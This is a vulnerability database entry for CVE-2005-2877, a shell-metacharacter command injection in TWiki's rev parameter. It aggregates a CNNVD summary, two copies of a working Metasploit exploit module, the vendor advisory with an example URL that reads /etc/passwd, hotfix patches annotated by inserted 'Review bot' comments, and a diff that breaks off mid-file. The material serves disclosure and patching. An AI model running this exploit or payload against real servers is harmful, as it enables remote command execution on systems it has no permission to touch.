CVE-2005-2877
CVSS 7.5
Published: 2005-09-16 16:03:00
Revised: 2016-10-17 23:31:03

[Original] The history (revision control) function in TWiki 02-Sep-2004 and earlier allows remote attackers to execute arbitrary code via shell metacharacters, as demonstrated via the rev parameter to TWikiUsers.


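[CNNVD] TWiki TWikiUsers INCLUDE Function Remote Arbitrary Command Execution Vulnerability (CNNVD-200509-146)

        TWiki is a flexible, easy-to-use and powerful enterprise collaboration platform.
        The TWiki INCLUDE function lets a malicious user compose a command line that is executed by the Perl backtick (``) operator; an attacker can use a specially crafted URI to execute arbitrary commands through the shell.
        Because the rev parameter of the INCLUDE variable is not properly checked for shell metacharacters, TWiki is affected by revision numbers that contain pipes and shell commands. All plugins and add-ons that use the TWiki::Func::readTopicText function to read previous topic revisions are affected by this vulnerability, such as TWiki:Plugins.RevCommentPlugin and TWiki:Plugins.CompareRevisionsAddon.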

- CVSS (base score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:twiki:twiki:2001-12-01
cpe:/a:twiki:twiki:2000-12-01
cpe:/a:twiki:twiki:2003-02-01
cpe:/a:twiki:twiki:2004-09-02
cpe:/a:twiki:twiki:2004-09-01

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2877
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2877
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200509-146
(Official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=112680475417550&w=2
(UNKNOWN)  BUGTRAQ  20050914 TWiki Remote Command Execution Vulnerability
http://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithRev
(VENDOR_ADVISORY)  CONFIRM  http://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithRev
http://www.kb.cert.org/vuls/id/757181
(VENDOR_ADVISORY)  CERT-VN  VU#757181
http://www.securityfocus.com/bid/14834
(PATCH)  BID  14834

- Vulnerability information

TWiki TWikiUsers INCLUDE Function Remote Arbitrary Command Execution Vulnerability
High risk    Input validation
2005-09-16 00:00:00 2006-01-19 00:00:00
Remote

- Advisories and patches

        The vendor has released an upgrade patch that fixes this security issue. The patch is available at:
        http://twiki.org/cgi-bin/view/Codev/UncoordinatedSecurityAlert23Feb2005

- Vulnerability information (16892)

TWiki History TWikiUsers rev Parameter Command Execution (EDBID:16892)
php webapps
2010-07-03 Verified
0 metasploit
N/A
##
# $Id: twiki_history.rb 9671 2010-07-03 06:21:31Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'TWiki History TWikiUsers rev Parameter Command Execution',
			'Description'    => %q{
					This module exploits a vulnerability in the history component of TWiki.
				By passing a 'rev' parameter containing shell metacharacters to the TWikiUsers
				script, an attacker can execute arbitrary OS commands.
			},
			'Author'         =>
				[
					'B4dP4nd4',   # original discovery
					'jduck'       # metasploit version
				],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9671 $',
			'References'     =>
				[
					[ 'CVE', '2005-2877' ],
					[ 'OSVDB', '19403' ],
					[ 'BID', '14834' ],
					[ 'URL', 'http://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithRev' ]
				],
			'Privileged'     => true, # web server context
			'Payload'        =>
				{
					'DisableNops' => true,
					'BadChars'    => '',
					'Space'       => 1024,
				},
			'Platform'       => [ 'unix' ],
			'Arch'           => ARCH_CMD,
			'Targets'        => [[ 'Automatic', { }]],
			'DisclosureDate' => 'Sep 14 2005',
			'DefaultTarget'  => 0))

		register_options(
			[
				OptString.new('URI', [ true, "TWiki bin directory path", "/twiki/bin" ]),
			], self.class)
	end


	#
	# NOTE: This is not perfect, since it requires write access to the bin
	# directory. Unfortunately, determining the main directory isn't
	# trivial, or otherwise I would write there (required to be writable
	# per installation steps).
	#
	def check
		test_file = rand_text_alphanumeric(8+rand(8))
		cmd_base = datastore['URI'] + '/view/Main/TWikiUsers?rev='
		test_url = datastore['URI'] + '/' + test_file

		# first see if it already exists (it really shouldn't)
		res = send_request_raw({
				'uri' => test_url
			}, 25)
		if (not res) or (res.code != 404)
			print_error("WARNING: The test file exists already!")
			return Exploit::CheckCode::Safe
		end

		# try to create it
		print_status("Attempting to create #{test_url} ...")
		rev = rand_text_numeric(1+rand(5)) + ' `touch ' + test_file + '`#'
		res = send_request_raw({
				'uri' => cmd_base + Rex::Text.uri_encode(rev)
			}, 25)
		if (not res) or (res.code != 200)
			return Exploit::CheckCode::Safe
		end

		# try to run it, 500 code == successfully made it
		res = send_request_raw({
				'uri' => test_url
			}, 25)
		if (not res) or (res.code != 500)
			return Exploit::CheckCode::Safe
		end

		# delete the tmp file
		print_status("Attempting to delete #{test_url} ...")
		rev = rand_text_numeric(1+rand(5)) + ' `rm -f ' + test_file + '`#'
		res = send_request_raw({
				'uri' => cmd_base + Rex::Text.uri_encode(rev)
			}, 25)
		if (not res) or (res.code != 200)
			print_error("WARNING: unable to remove test file (#{test_file})")
		end

		return Exploit::CheckCode::Vulnerable
	end


	def exploit

		rev = rand_text_numeric(1+rand(5))
		rev << ' `' + payload.encoded + '`#'
		query_str = datastore['URI'] + '/view/Main/TWikiUsers'
		query_str << '?rev='
		query_str << Rex::Text.uri_encode(rev)

		res = send_request_cgi({
				'method'    => 'GET',
				'uri'	      => query_str,
			}, 25)

		if (res and res.code == 200)
			print_status("Successfully sent exploit request")
		else
			raise RuntimeError, "Error sending exploit request"
		end

		handler
	end

end
		

- Vulnerability information (F86538)

TWiki History TWikiUsers rev Parameter Command Execution (PacketStormID:F86538)
2010-02-23 00:00:00
B4dP4nd4  metasploit.com
exploit,arbitrary,shell
CVE-2005-2877

This Metasploit module exploits a vulnerability in the history component of TWiki. By passing a 'rev' parameter containing shell metacharacters to the TWikiUsers script, an attacker can execute arbitrary OS commands.

##
# $Id: twiki_history.rb 8578 2010-02-21 20:31:09Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'TWiki History TWikiUsers rev Parameter Command Execution',
			'Description'    => %q{
					This module exploits a vulnerability in the history component of TWiki.
				By passing a 'rev' parameter containing shell metacharacters to the TWikiUsers 
				script, an attacker can execute arbitrary OS commands.
			},
			'Author'         =>
				[
					'B4dP4nd4',   # original discovery
					'jduck'       # metasploit version
				],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 8578 $',
			'References'     =>
				[
					[ 'CVE', '2005-2877' ],
					[ 'OSVDB', '19403' ],
					[ 'BID', '14384' ],
					[ 'URL', 'http://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithRev' ]
				],
			'Privileged'     => true, # web server context
			'Payload'        =>
				{
					'DisableNops' => true,
					'BadChars'    => '',
					'Space'       => 1024,
				},
			'Platform'       => [ 'unix' ],
			'Arch'           => ARCH_CMD,
			'Targets'        => [[ 'Automatic', { }]],
			'DisclosureDate' => 'Sep 14 2005',
			'DefaultTarget'  => 0))

			register_options(
				[
					OptString.new('URI', [ true, "TWiki bin directory path", "/twiki/bin" ]),
				], self.class)
	end


	#
	# NOTE: This is not perfect, since it requires write access to the bin
	# directory. Unfortunately, determining the main directory isn't
	# trivial, or otherwise I would write there (required to be writable
	# per installation steps).
	#
	def check
		test_file = rand_text_alphanumeric(8+rand(8))
		cmd_base = datastore['URI'] + '/view/Main/TWikiUsers?rev='
		test_url = datastore['URI'] + '/' + test_file

		# first see if it already exists (it really shouldn't)
		res = send_request_raw({
				'uri' => test_url
			}, 25)
		if (not res) or (res.code != 404)
			print_error("WARNING: The test file exists already!")
			return Exploit::CheckCode::Safe
		end

		# try to create it
		print_status("Attempting to create #{test_url} ...")
		rev = rand_text_numeric(1+rand(5)) + ' `touch ' + test_file + '`#'
		res = send_request_raw({
				'uri' => cmd_base + Rex::Text.uri_encode(rev)
			}, 25)
		if (not res) or (res.code != 200)
			return Exploit::CheckCode::Safe
		end

		# try to run it, 500 code == successfully made it
		res = send_request_raw({
				'uri' => test_url
			}, 25)
		if (not res) or (res.code != 500)
			return Exploit::CheckCode::Safe
		end
		
		# delete the tmp file
		print_status("Attempting to delete #{test_url} ...")
		rev = rand_text_numeric(1+rand(5)) + ' `rm -f ' + test_file + '`#'
		res = send_request_raw({
				'uri' => cmd_base + Rex::Text.uri_encode(rev)
			}, 25)
		if (not res) or (res.code != 200)
			print_error("WARNING: unable to remove test file (#{test_file})")
		end

		return Exploit::CheckCode::Vulnerable
	end


	def exploit

		rev = rand_text_numeric(1+rand(5))
		rev << ' `' + payload.encoded + '`#'
		query_str = datastore['URI'] + '/view/Main/TWikiUsers'
		query_str << '?rev='
		query_str << Rex::Text.uri_encode(rev)

		res = send_request_cgi({
			'method'    => 'GET',
			'uri'	      => query_str,
		}, 25)

		if (res and res.code == 200)
			print_status("Successfully sent exploit request")
		else
			raise RuntimeError, "Error sending exploit request"
		end

		handler
	end

end
    

- Vulnerability information (F40104)

twikivuln.txt (PacketStormID:F40104)
2005-09-20 00:00:00
B4dP4nd4  twiki.org
advisory,remote
CVE-2005-2877

TWiki up to and including TWikiRelease02Sep2004 is vulnerable to remote command execution in the revision control function. Detailed exploitation provided.

This advisory alerts you of a potential security issue with your
TWiki installation: The TWiki history function allows arbitrary
shell command execution. The permanent place for this advisory is
http://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithRev .
Please see updates and follow-up on that topic.

If you do not use TWiki, please ignore this e-mail. If you don't
administer your TWiki site, or started a site now administered by
someone else, please pass it to the current TWiki site administrator.

Table of Contents:

  * Vulnerable Software Version
  * Attack Vectors
  * Impact
  * MITRE Name for this Vulnerability
  * Details
  * Countermeasures
  * Authors and Credits
  * Hotfix
     * Patch for TWiki Production Release 01-Sep-2004 and 02-Sep-2004
     * Patch for TWiki Production Release 01-Feb-2003
     * Patch for TWiki Production Release 01-Dec-2001
     * Patch for TWiki Production Release 01-Dec-2000
  * TWiki News


---++ Vulnerable Software Version

  * TWikiRelease02Sep2004[2] -- TWiki20040902.zip
  * TWikiRelease01Sep2004[3] -- TWiki20040901.zip
  * TWikiRelease01Feb2003[4] -- TWiki20030201.zip
  * TWikiRelease01Dec2001[5] -- TWiki20011201.zip
  * TWikiRelease01Dec2000[6] -- TWiki20001201.zip

Not affected are:
  * Recent DakarReleases[7] (upcoming production release, soon)
  * TWikiRelease01Sep2004 patched with Florian Weimer's
    UncoordinatedSecurityAlert23Feb2005[8]


---++ Attack Vectors

HTTP GET requests towards the Wiki server (typically port 80/TCP).
Usually, no prior authentication is necessary.

Possibly also HTTP POST, but this is untested.


---++ Impact

An attacker is able to execute arbitrary shell commands with the
privileges of the web server process, such as user nobody.


---++ MITRE Name for this Vulnerability

The Common Vulnerabilities and Exposures project has assigned the
name CAN-2005-2877 to this vulnerability.


---++ Details

The TWiki revision control function uses a user supplied URL
parameter to compose a command line executed by the Perl backtick
(``) operator.

The URL parameter is not checked properly for shell metacharacters
and is thus vulnerable to revision numbers containing pipes and
shell commands. Exploit is possible on topics with two or more
revisions.

Example URL path with exploited rev parameter:
/cgi-bin/view/Main/TWikiUsers?rev=2%20%7Cless%20/etc/passwd

If access to TWiki is not restricted by other means, attackers can
use the revision function without prior authentication.

See Also: SecurityAlertExecuteCommandsWithSearch[9] and
UncoordinatedSecurityAlert23Feb2005[8]


---++ Countermeasures

  * Apply hotfix (see patches below)
     * NOTE: The hotfix is known to prevent the current attacks,
       but it might not be a complete fix
  * Upgrade to the latest patched production TWikiRelease03Sep2004[1]
     * NOTE: If you are running an *unmodified*
       TWikiRelease02Sep2004[2], simply copy the patched
       lib/TWiki/Store.pm, lib/TWiki/UI/RDiff.pm,
       lib/TWiki/UI/View.pm and lib/TWiki/UI/Viewfile.pm to your
       installation
  * Apply patch of UncoordinatedSecurityAlert23Feb2005[6] (but see
    known issues of that patch)
  * Filter access to the web server
  * Use the web server software to restrict access to the web pages
    served by TWiki


---++ Authors and Credits

  * Credit to B4dP4nd4 (b4dp4nd4@gmail.com) for disclosing the issue
    to the twiki-security@lists.sourceforge.net mailing list
  * PeterThoeny, CrawfordCurrie, SvenDowideit, ColasNahaboo,
    WillNorris, RichardDonkin, B4dP4nd4 and Florian Weimer for
    contributing to this advisory


---++ Hotfix

---+++ Patch for TWiki Production Release 01-Sep-2004 and 02-Sep-2004

Affected files: =twiki/lib/TWiki/Store.pm=, =twiki/lib/TWiki/UI/RDiff.pm=,
=twiki/lib/TWiki/UI/View.pm=, =twiki/lib/TWiki/UI/Viewfile.pm=

See also attached patch file TWiki200409-02-03.patch

--- lib/TWiki/Store.pm.orig Thu Jul 22 01:43:40 2004
+++ lib/TWiki/Store.pm      Thu Sep  8 21:30:44 2005
@@ -572,7 +572,9 @@
    }

    $theRev = "" unless( $theRev );
-    $theRev =~ s/^1\.//o;
+    $theRev =~ s/r?1\.//o;  # cut 'r' and major
+    # Fix for Codev.SecurityAlertExecuteCommandsWithRev
+    $theRev = "" unless( $theRev =~ s/.*?([0-9]+).*/$1/o );

    $topicHandler = _getTopicHandler( $theWebName, $theTopic,
$attachment ) if( ! $topicHandler );
    my( $rcsOut, $rev, $date, $user, $comment ) =
$topicHandler->getRevisionInfo( $theRev );
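Review bot: the added check on `$theRev` is a substitution rather than a whole-string match, so it can succeed while leaving part of the input in place. `s/.*?([0-9]+).*/$1/o` has no anchors and no `/s` flag, and `.` does not match a newline, so only the line holding the first digit run is rewritten and the other lines of a multi-line value stay in `$theRev` when it is passed to `getRevisionInfo`. Accept the value only when all of it is a number, for example `$theRev = ( $theRev =~ /\A([0-9]+)\z/ ) ? $1 : "";`, which also states the intent more plainly than the substitute-and-test form.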
--- lib/TWiki/UI/RDiff.pm.orig      Sun Aug  8 01:28:45 2004
+++ lib/TWiki/UI/RDiff.pm   Thu Sep  8 21:33:13 2005
@@ -409,6 +409,9 @@
    if( ! $rev2 ) { $rev2 = 0; }
    $rev1 =~ s/r?1\.//go;  # cut 'r' and major
    $rev2 =~ s/r?1\.//go;  # cut 'r' and major
+    # Fix for Codev.SecurityAlertExecuteCommandsWithRev
+    $rev1 = $maxrev unless( $rev1 =~ s/.*?([0-9]+).*/$1/o );
+    $rev2 = $maxrev unless( $rev2 =~ s/.*?([0-9]+).*/$1/o );
    if( $rev1 < 1 )       { $rev1 = $maxrev; }
    if( $rev1 > $maxrev ) { $rev1 = $maxrev; }
    if( $rev2 < 1 )       { $rev2 = 1; }
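Review bot: the fallback chosen for a malformed `$rev2` disagrees with the defaults around it. An empty `$rev2` is set to 0 just above the added lines and then clamped to 1 by `if( $rev2 < 1 )`, whereas a `$rev2` that contains no digits now becomes `$maxrev`, so a bad second revision yields a different diff range than a missing one. Falling back to 0 for `$rev2` would keep the two cases consistent; a short comment naming the intended default would help either way.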
--- lib/TWiki/UI/View.pm.orig       Tue Aug 24 23:36:15 2004
+++ lib/TWiki/UI/View.pm    Thu Sep  8 21:34:52 2005
@@ -107,6 +107,8 @@

    if( $rev ) {
      $rev =~ s/r?1\.//go;  # cut 'r' and major
+      # Fix for Codev.SecurityAlertExecuteCommandsWithRev
+      $rev = $maxrev unless( $rev =~ s/.*?([0-9]+).*/$1/o );
      if( $rev < 1 )       { $rev = 1; }
      if( $rev > $maxrev ) { $rev = $maxrev; }
    } else {
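Review bot: a `rev` value with no digits is silently replaced by `$maxrev` in the added line, so the requester gets the latest revision with no sign that the request was malformed, and nothing is written to a log. The same strip-and-extract pair is also added to Store.pm, RDiff.pm and Viewfile.pm in this patch; one shared helper that validates a revision string and logs a warning when it rejects one would remove the four copies and leave a trace of rejected requests.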
--- lib/TWiki/UI/Viewfile.pm.orig   Fri May 28 23:51:35 2004
+++ lib/TWiki/UI/Viewfile.pm        Thu Sep  8 21:35:59 2005
@@ -43,6 +43,9 @@

  my $fileName = $query->param( 'filename' );
  my $rev = $query->param( 'rev' ) || "";
+  $rev =~ s/r?1\.//o;  # cut 'r' and major
+  # Fix for Codev.SecurityAlertExecuteCommandsWithRev
+  $rev = "" unless( $rev =~ s/.*?([0-9]+).*/$1/o );

  return unless TWiki::UI::webExists( $webName, $topic );
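Review bot: the added strip `$rev =~ s/r?1\.//o;` omits the `/g` flag that the same statement carries in the RDiff.pm and View.pm hunks (`s/r?1\.//go`), so the call sites do not normalise the prefix the same way. Pick one form for all of them. The `/o` flag can be dropped everywhere, since the pattern interpolates no variables and the flag has no effect.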



---+++ Patch for TWiki Production Release 01-Feb-2003

Affected files: =twiki/lib/TWiki/Store.pm=, =twiki/bin/rdiff=,
=twiki/bin/view=, =twiki/bin/viewfile=

--- lib/TWiki/Store.pm.orig     Sat Jan  4 17:36:56 2003
+++ lib/TWiki/Store.pm  Thu Sep  8 23:10:58 2005
@@ -351,9 +351,11 @@
    if( ! $theWebName ) {
        $theWebName = $TWiki::webName;
    }
-
-    $theRev =~ s/^1\.//o;

+    $theRev =~ s/r?1\.//o;  # cut 'r' and major
+    # Fix for Codev.SecurityAlertExecuteCommandsWithRev
+    $theRev = "" unless( $theRev =~ s/.*?([0-9]+).*/$1/o );
+
    $topicHandler = _getTopicHandler( $theWebName, $theTopic,
$attachment ) if( ! $topicHandler );
    my( $rcsOut, $rev, $date, $user, $comment ) =
$topicHandler->getRevisionInfo( $theRev );
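Review bot: replacing `s/^1\.//o` with `s/r?1\.//o` drops the `^` anchor, so the major-version strip can now match in the middle of the value instead of only at its start. `s/^r?1\.//` keeps the old behaviour and still accepts the `r` prefix. Unlike the hunk for the 01-Sep-2004 release, no `$theRev = "" unless( $theRev );` guard is visible ahead of the substitution here, so an undefined `$theRev` would reach `=~`; add the guard if it is not already above this context.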

--- bin/rdiff.orig      Sat Feb  1 00:57:32 2003
+++ bin/rdiff   Thu Sep  8 23:18:05 2005
@@ -155,6 +155,9 @@
        if( ! $rev2 ) { $rev2 = 0; }
        $rev1 =~ s/r?1\.//go;  # cut 'r' and major
        $rev2 =~ s/r?1\.//go;  # cut 'r' and major
+        # Fix for Codev.SecurityAlertExecuteCommandsWithRev
+        $rev1 = $maxrev unless( $rev1 =~ s/.*?([0-9]+).*/$1/o );
+        $rev2 = $maxrev unless( $rev2 =~ s/.*?([0-9]+).*/$1/o );
        if( $rev1 < 1 )       { $rev1 = $maxrev; }
        if( $rev1 > $maxrev ) { $rev1 = $maxrev; }
        if( $rev2 < 1 )       { $rev2 = 1; }
--- bin/view.orig       Thu Jan 30 00:21:25 2003
+++ bin/view    Thu Sep  8 23:13:47 2005
@@ -123,6 +123,8 @@
        writeDebug( "maxrev = $maxrev" );
        if( $rev ) {
            $rev =~ s/r?1\.//go;  # cut 'r' and major
+            # Fix for Codev.SecurityAlertExecuteCommandsWithRev
+            $rev = $maxrev unless( $rev =~ s/.*?([0-9]+).*/$1/o );
            if( $rev < 1 )       { $rev = 1; }
            if( $rev > $maxrev ) { $rev = $maxrev; }
        } else {
--- bin/viewfile.orig   Sun Jan  5 00:36:54 2003
+++ bin/viewfile        Thu Sep  8 23:14:54 2005
@@ -63,6 +63,9 @@
    my $fileName = $query->param( 'filename' );

    my $rev = $query->param( 'rev' ) || "";
+    $rev =~ s/r?1\.//o;  # cut 'r' and major
+    # Fix for Codev.SecurityAlertExecuteCommandsWithRev
+    $rev = "" unless( $rev =~ s/.*?([0-9]+).*/$1/o );
    my $topRev = &TWiki::Store::getRevisionNumber( $webName, $topic,
$fileName );

    if( ( $rev ) && ( $rev ne $topRev ) ) {
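Review bot: the context line `my $topRev = &TWiki::Store::getRevisionNumber( $webName, $topic,` has been wrapped onto a second line (`$fileName );`) in this inline copy, as have two context lines in the Store.pm hunk, so the hunk no longer matches the source file and `patch` will reject it. Apply from an unwrapped copy of the patch, or add the three `+` lines by hand after `my $rev = $query->param( 'rev' ) || "";`.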


---+++ Patch for TWiki Production Release 01-Dec-2001

Affected files: =twiki/bin/rdiff=, =twiki/bin/view=, =twiki/bin/viewfile=

--- bin/rdiff.orig      Tue Nov 13 18:59:02 2001
+++ bin/rdiff   Thu Sep  8 23:51:50 2005
@@ -149,6 +149,9 @@
        if( ! $rev2 ) { $rev2 = 0; }
        $rev1 =~ s/r?1\.//go;  # cut 'r' and major
        $rev2 =~ s/r?1\.//go;  # cut 'r' and major
+        # Fix for Codev.SecurityAlertExecuteCommandsWithRev
+        $rev1 = $maxrev unless( $rev1 =~ s/.*?([0-9]+).*/$1/o );
+        $rev2 = $maxrev unless( $rev2 =~ s/.*?([0-9]+).*/$1/o );
        if( $rev1 < 1 )       { $rev1 = $maxrev; }
        if( $rev1 > $maxrev ) { $rev1 = $maxrev; }
        if( $rev2 < 1 )       { $rev2 = 1; }
--- bin/view.orig       Mon Dec  3 09:11:20 2001
+++ bin/view    Thu Sep  8 23:52:57 2005
@@ -114,6 +114,8 @@
        writeDebug( "maxrev = $maxrev" );
        if( $rev ) {
            $rev =~ s/r?1\.//go;  # cut 'r' and major
+            # Fix for Codev.SecurityAlertExecuteCommandsWithRev
+            $rev = $maxrev unless( $rev =~ s/.*?([0-9]+).*/$1/o );
            if( $rev < 1 )       { $rev = 1; }
            if( $rev > $maxrev ) { $rev = $maxrev; }
        } else {
--- bin/viewfile.orig   Fri Oct  5 18:03:20 2001
+++ bin/viewfile        Thu Sep  8 23:53:45 2005
@@ -62,6 +62,9 @@
    my $fileName = $query->param( 'filename' );

    my $rev = $query->param( 'rev' ) || "";
+    $rev =~ s/r?1\.//o;  # cut 'r' and major
+    # Fix for Codev.SecurityAlertExecuteCommandsWithRev
+    $rev = "" unless( $rev =~ s/.*?([0-9]+).*/$1/o );
    my $topRev = &TWiki::Store::getRevisionNumber( $webName, $topic,
$fileName );

    if( ( $rev ) && ( $rev ne $topRev ) ) {


---+++ Patch for TWiki Production Release 01-Dec-2000

Affected files: =twiki/bin/rdiff=, =twiki/bin/view=

--- bin/rdiff.orig      Tue Nov 14 23:08:48 2000
+++ bin/rdiff   Fri Sep  9 00:04:25 2005
@@ -139,6 +139,9 @@
       if( ! $rev2 ) { $rev2 = 0; }
        $rev1 =~ s/1\.//go;  # cut major
        $rev2 =~ s/1\.//go;  # cut major
+        # Fix for Codev.SecurityAlertExecuteCommandsWithRev
+        $rev1 = $maxrev unless( $rev1 =~ s/.*?([0-9]+).*/$1/o );
+        $rev2 = $maxrev unless( $rev2 =~ s/.*?([0-9]+).*/$1/o );
        if( $rev1 < 1 )       { $rev1 = $maxrev; }
        if( $rev1 > $maxrev ) { $rev1 = $maxrev; }
        if( $rev2 < 1 )       { $rev2 = 1; }
--- bin/view.orig       Tue Nov 14 23:14:31 2000
+++ bin/view    Fri Sep  9 00:05:10 2005
@@ -77,6 +77,8 @@
       $maxrev =~ s/1\.//go;  # cut major
       if( $rev ) {
            $rev =~ s/1\.//go;  # cut major
+            # Fix for Codev.SecurityAlertExecuteCommandsWithRev
+            $rev = $maxrev unless( $rev =~ s/.*?([0-9]+).*/$1/o );
            if( $rev < 1 )       { $rev = 1; }
            if( $rev > $maxrev ) { $rev = $maxrev; }
            $text= &wiki::readVersion( $topic, "1.$rev" );


---++ TWiki News

  * A new TWiki release is upcoming soon, code named DakarRelease[7]
  * To customize your TWiki installation, TWiki.org offers now
    177 Plugin packages[11], 56 Add-on packages[10], 30 Skin
    packages[12], and 11 TWiki contrib packages [13]
  * Codev.TWikiSecurityAlertProcess[14] documents our security
    process
  * Wikis and TWiki get covered more by the press[15]
  * TWiki is represented at the International Symposium on Wikis[16]
    in San Diego, 17-18 Oct 2005
  * A new book on Wikis in the Workplace is in work[17]

Best regards,
Peter


[1]:  http://twiki.org/cgi-bin/view/Codev/TWikiRelease03Sep2004
[2]:  http://twiki.org/cgi-bin/view/Codev/TWikiRelease02Sep2004
[3]:  http://twiki.org/cgi-bin/view/Codev/TWikiRelease01Sep2004
[4]:  http://twiki.org/cgi-bin/view/Codev/TWikiRelease01Feb2003
[5]:  http://twiki.org/cgi-bin/view/Codev/TWikiRelease01Dec2001
[6]:  http://twiki.org/cgi-bin/view/Codev/TWikiRelease01Dec2000
[7]:  http://twiki.org/cgi-bin/view/Codev/DakarReleases
[8]:  http://twiki.org/cgi-bin/view/Codev/UncoordinatedSecurityAlert23Feb2005
[9]:  http://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithSearch
[10]: http://twiki.org/cgi-bin/view/Plugins/AddOnPackage
[11]: http://twiki.org/cgi-bin/view/Plugins/PluginPackage
[12]: http://twiki.org/cgi-bin/view/Plugins/SkinPackage
[13]: http://twiki.org/cgi-bin/view/Plugins/ContribPackage
[14]: http://twiki.org/cgi-bin/view/Codev/TWikiSecurityAlertProcess
[15]: http://twiki.org/cgi-bin/view/Codev/TWikiInTheNews
[16]: http://twiki.org/cgi-bin/view/Codev/InternationalSymposiumOnWikis
[17]: http://twiki.org/cgi-bin/view/Codev/WikisInTheWorkplaceBook


--
  * Peter Thoeny                           Peter@Thoeny.com
  * Is your team already TWiki enabled?    http://TWiki.org
  * This e-mail is:  (x) public  (_) ask first  (_) private

--- ../TWiki20040902/lib/TWiki/Store.pm 2004-07-22 10:43:40.000000000 +0200
+++ lib/TWiki/Store.pm  2005-09-09 06:30:44.000000000 +0200
@@ -572,7 +572,9 @@
    }

    $theRev = "" unless( $theRev );
-    $theRev =~ s/^1\.//o;
+    $theRev =~ s/r?1\.//o;  # cut 'r' and major
+    # Fix for Codev.SecurityAlertExecuteCommandsWithRev
+    $theRev = "" unless( $theRev =~ s/.*?([0-9]+).*/$1/o );

    $topicHandler = _getTopicHandler( $theWebName, $theTopic,
$attachment ) if( ! $topicHandler );
    my( $rcsOut, $rev, $date, $user, $comment ) =
$topicHandler->getRevisionInfo( $theRev );
--- ../TWiki20040902/lib/TWiki/UI/RDiff.pm      2004-08-08
10:28:45.000000000 +0200
+++ lib/TWiki/UI/RDiff.pm       2005-09-09 06:33:13.000000000 +0200
@@ -409,6 +409,9 @@
    if( ! $rev2 ) { $rev2 = 0; }
    $rev1 =~ s/r?1\.//go;  # cut 'r' and major
    $rev2 =~ s/r?1\.//go;  # cut 'r' and major
+    # Fix for Codev.SecurityAlertExecuteCommandsWithRev
+    $rev1 = $maxrev unless( $rev1 =~ s/.*?([0-9]+).*/$1/o );
+    $rev2 = $maxrev unless( $rev2 =~ s/.*?([0-9]+).*/$1/o );
    if( $rev1 < 1 )       { $rev1 = $maxrev; }
    if( $rev1 > $maxrev ) { $rev1 = $maxrev; }
    if( $rev2 < 1 )       { $rev2 = 1; }
--- ../TWiki20040902/lib/TWiki/UI/Viewfile.pm   2004-05-29
08:51:35.000000000 +0200
+++ lib/TWiki/UI/Viewfile.pm    2005-09-09 06:35:59.000000000 +0200
@@ -43,6 +43,9 @@

  my $fileName = $query->param( 'filename' );
  my $rev = $query->param( 'rev' ) || "";
+  $rev =~ s/r?1\.//o;  # cut 'r' and major
+  # Fix for Codev.SecurityAlertExecuteCommandsWithRev
+  $rev = "" unless( $rev =~ s/.*?([0-9]+).*/$1/o );

  return unless TWiki::UI::webExists( $webName, $topic );

--- ../TWiki20040902/lib/TWiki/UI/View.pm       2004-08-25
08:36:15.000000000 +0200
+++ lib/TWiki/UI/View.pm        2005-09-09 06:34:52.000000000 +0200
@@ -107,6 +107,8 @@

    if( $rev ) {
      $rev =~ s/r?1\.//go;  # cut 'r' and major
+      # Fix for Codev.SecurityAlertExecuteCommandsWithRev
+      $rev = $maxrev unless( $rev =~ s/.*?([0-9]+).*/$1/o );
      if( $rev < 1 )       { $rev = 1; }
      if( $rev > $maxrev ) { $rev = $maxrev; }
    } else {
--- ../TWiki20040902/lib/TWiki.pm       2004-11-20 06:31:53.000000000 +0100
+++ lib/TWiki.pm        2005-09-10 03:01:49.000000000 +0200
@@ -154,7 +154,7 @@

 # ===========================
 # TWiki version:
-$wikiversion      = '02 Sep 2004 $Rev: 1742 $';
+$wikiversion      = '03 Sep 2004 $Rev: 1742 $';

 # ===========================
 # Key Global variables, required for writeDebug
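Review bot: `$wikiversion` changes only its date, from '02 Sep 2004' to '03 Sep 2004', while `$Rev: 1742 $` stays the same, so the revision keyword no longer distinguishes the patched release from the unpatched one. Anyone checking whether an installation carries the fix has to compare the date string; bump the revision keyword as well, or state in the release notes that the date is the only marker.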
--- ../TWiki20040902/license.txt        2004-11-20 06:31:10.000000000 +0100
+++ license.txt 2005-09-10 03:04:46.000000000 +0200
@@ -1,4 +1,4 @@
-Copyright and License of TWiki, 02 Sep 2004
+Copyright and License of TWiki, 03 Sep 2004
 -------------------------------------------

 TWiki (TM) is copyrighted (C) 1999-2004 by Peter Thoeny,
--- ../TWiki20040902/readme.txt 2004-11-20 06:37:33.000000000 +0100
+++ readme.txt  2005-09-10 03:05:03.000000000 +0200
@@ -5,7 +5,7 @@
 TWiki Distribution
 ------------------

-Version: 02 Sep 2004 $Rev: 1742 $
+Version: 03 Sep 2004 $Rev: 1742 $
 Release type: Production release

 This version is TWiki Release 01-Sep-2004 patched for
--- ../TWiki20040902/TWikiDocumentation.html    2004-08-31
18:35:18.000000000 +0200
